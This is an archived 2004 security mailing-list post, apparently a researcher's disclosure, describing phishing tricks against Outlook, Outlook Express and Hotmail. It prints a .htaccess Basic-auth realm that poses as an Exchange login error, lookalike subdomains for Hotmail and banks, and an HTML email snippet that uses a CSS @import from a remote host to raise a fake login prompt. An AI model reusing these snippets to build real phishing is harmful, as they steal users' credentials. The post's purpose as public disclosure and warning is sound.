Stupid Phishing Tricks

http-equiv_at_excite.com
Date: 05/21/04

Next message: Seguridad en Computo - UNAM: "!! Conference Program Computer Security Mexico 2004 !!"

Previous message: Paul Szabo: "Eudora 6.1.1 attachment spoof, LaunchProtect"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date:         Fri, 21 May 2004 13:46:47 -0000
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

Phriday , May 21, 2004

Several pheeble yet interesting phishing possibilities arise as
phollows:

Take one .htaccess trivially modified to suit the target
scenario:

AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic

One throw-away domain which can include the target's host name:

http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com

A couple of ridiculous email contraptions:

<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE>

1. Outlook Express

[screen shot http://www.malware.com/phool.png 56KB]

2. Outlook 2003

[screen shot: http://www.malware.com/ohlook.png 39KB]

note: the above 'style ***' works on outbound [reply to] [so
much for not downloading external content] inbound can be
achieved as well via http://securityfocus.com/bid/10369 which
has an even more convincing network login applet

3. Hotmail

[screen shot: http://www.malware.com/goturmail.png 91KB]

hint : hotmail[and other] web designer people; off-set the html
login form on the site as many prime banks have done.

The possibilities are obviously endless.

BE AWARE OF THE SHARKS OUT THERE

NB: anyone have any contact or connection to the upper
management security or abuse dept. of one public company called:
SAVVIS Communications. http://savvis.net/ it appears their abuse
dept. is woefully negligent in attending to abuse affairs.

End Call

--
http://www.malware.com
-----
Patch Automation v6.0 by Mobile Automation, Inc. allows you to quickly
identify and fix all PC's that are exposed to the Sasser worm! Our
solution provides quick and seamless discovery and deployment of all your
PC computer's Microsoft security patching needs. Regardless of where
you're PC's reside (inside the LAN, at home or on the road), Patch
Automation gets the job done. Contact us to learn about our free 30-day
trial version at 800-344-1150 or visit our website at
<http://www.patchautomation.com>
-----

Next message: Seguridad en Computo - UNAM: "!! Conference Program Computer Security Mexico 2004 !!"

Previous message: Paul Szabo: "Eudora 6.1.1 attachment spoof, LaunchProtect"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]